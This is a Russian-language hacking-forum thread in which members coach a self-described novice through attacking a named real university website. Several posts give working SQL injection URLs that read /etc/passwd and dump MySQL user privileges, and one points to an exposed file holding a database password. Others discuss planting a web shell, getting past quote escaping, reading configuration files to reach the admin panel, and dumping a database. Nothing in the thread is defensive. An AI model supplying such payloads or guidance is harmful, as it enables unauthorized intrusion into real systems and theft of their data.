Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Не думаю. Я все такие вещи складирую. Сегодня не пригодилась - завтра обязательно пригодится. Или послезавтра. Имхо.
     
  2. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    Кто, что может подсказать (статьи, топики и т.д.) для выгодного использования одинакового ИП адреса нескольких ресурсов (один хостер)?
    Интересно узнать все подробности для выгоды хакеру)
     
  3. waik

    waik Elder - Старейшина

    Joined:
    2 Nov 2008
    Messages:
    405
    Likes Received:
    163
    Reputations:
    12
    вот на сайтец левый наткнулся.Дак он выдает странную ошибку,сайт должен быть посвящен японским часам.вот ссыль _ttp://urbanjunkie.ru/
    Выдаёт ошибку странного содержания :

    PHP:
    SQL ErrorAccess denied for user 'u28586'@'localhost' (using passwordYESat /var/www/vhosts/urbanjunkie.ru/httpdocs/inc/dbconfig.inc line 4  
    Array 
    (     
    [
    code] => 1045    
     
    [message] => Access denied for user 'u28586'@'localhost' (using passwordYES)    
     [
    query] => mysql_connect()     
    [
    context] => /var/www/vhosts/urbanjunkie.ru/httpdocs/inc/dbconfig.inc line 4 
    )
    Мне нече не надо,просто может уязвимость какая на нём.
     
  4. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Никто не ответил =(.Ещё вопрос: почему в файле /etc/passwd стоит хэш пароля?))

    Версия Апача - 1.3.27
     
  5. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    вто инъекция под рутом.

    Вопрос 1. Почему не работает вот так а) (/etc/passwd) b) ('/etc/passwd')
    вопрос 2. Возможно ли залить шелл туда?

    Извиняюсь за нубский вопрос, но прошу помощи плиз.
     
  6. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    1.magic_quotes_gpc,addslashes или ещё что-нибудь.
    2.Зачем ты юзаешь concat_ws() ? Убери всё и сделай так:

    http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6574632f706173737764)/*
     
  7. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Есть ли при таких абстоятельсвах возможность залить шелл?
     
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Проверь права: select concat_ws(0x3a,user,file_priv) from mhsql.user where user=твой юзер в HEX

    Если У - то можно полюбас.Если N - обломался,чуваг.
     
  9. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Помоги составить этот запрос на данном примере плиз. Я просто новичок.

    HTML:
    http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5+limit+1,1/*
     
  10. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=-21595+union+select+unhex(hex(concat_ws(0x3a,user,file_priv))),2,3,4,5+from+mysql.user+where+user=0x726F6F74/*

    Повезло
     
  11. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    Даже вот так можно
    http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=-21595+union+select+unhex(hex(group_concat(0x0a,user,0x3a,file_priv))),2,3,4,5+from+mysql.user/*
     
    1 person likes this.
  12. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Спс. люди. А теперь мне помогите залить туда файл /tmp/phpinfo.php
    с текстом <? phpinfo(); ?>

    Я читал статьи на ачате, но там при заливке юзались ковычки и слэши а тут они вырублены. плиз подскажите


    add

    snake: ты её уже залил? помоги плиз соствит запрос.
     
    #7912 nub-hacker, 7 Jul 2009
    Last edited: 7 Jul 2009
  13. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    в помощь тебе, теперь залить станет легче...если конечно под запись найдешь диру))
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    А может и это поможет:
    Code:
    http://yarra.ics.uci.edu/bb/enrondemo/localhost/soa.properties
    
     
  15. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    спс за намёки. там пасс к БД. Но я очень прошу Вас помогите составить SQL запрос на заливку файла. Очень прошу плиз.
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Через скулю ты там шелл не зальешь, т.к. magic quotes=on и двойной запрос не работает. Забудь
     
    1 person likes this.
  17. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Понятно, просто чел под ником Велемир несколькими постами выше голову задурил что можно залить.

    А вы видите ещё способ залития туда шелла?
    Я думую что если там будет удалённое подключение Бд. то можно наверное тот пасс применить .

    Есть ещё способы?
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Файлы читать можешь? Можешь. Ищи админку, пытайся зайти, лей шелл. Ищи конфиги, читай, думай
     
  19. genadiez

    genadiez Member

    Joined:
    26 Dec 2008
    Messages:
    43
    Likes Received:
    16
    Reputations:
    0
    Доброго дня всем.
    Подскажите пожалуйста:

    Можно ли имея доступ к MySQL базе данных c правами INSERT каким либо образом (специально сконструированным запросом) поднять эти самые права, так, чтобы можно было базу данных слить?
    Или это не выполнимая задача?

    Заранее извиняюсь, если вопрос покажется глупым, просто разбираюсь в SQL-injection методом проб и ошибок (язык SQL знаю плохо:( )
     
  20. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    Для того что бы слить базу нужны права SELECT. Insert это уже для правки базы данных..
     
Thread Status:
Not open for further replies.